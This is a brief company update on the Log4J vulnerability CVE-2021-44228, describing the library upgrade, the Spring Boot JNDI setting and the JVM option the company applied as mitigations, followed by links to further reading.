Log4J Vulnerability

On December 10, 2021, a bug in Log4J, a ubiquitous logging mechanism present in many Java applications mas made public. You can find detailed information about CVE-2021-44228 by clicking here. This is a quick update to inform you how we addressed the issues in our backend applications, which are in great part built with Java Enterprise.

1. We have upgraded the Spring Boot applications to use the latest update of Log4J: org.apache.logging.log4j:log4j-bom:2.15.0
2. We configured the Spring Boot applications to ignore the JNDI requests: spring: jndi: ignore: true

1. Every VM is now running with the JVM Option - Dlog4j2.formatMsgNoLookups=true to mitigate any potential information disclosure.
2. Our backend services are not open, and they operate behind a firewall/load balancer configuration. We have investigated our logs and security systems to check for JNDI/LDAP requests and could not find any, leading us to believe that our systems have not been scanned for these vulnerabilities.

You can find more information about the Log4J vulnerability described in CVE-2021-44228 on these links:

• https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/
• https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot
• https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/
• https://github.com/YfryTchsGD/Log4jAttackSurface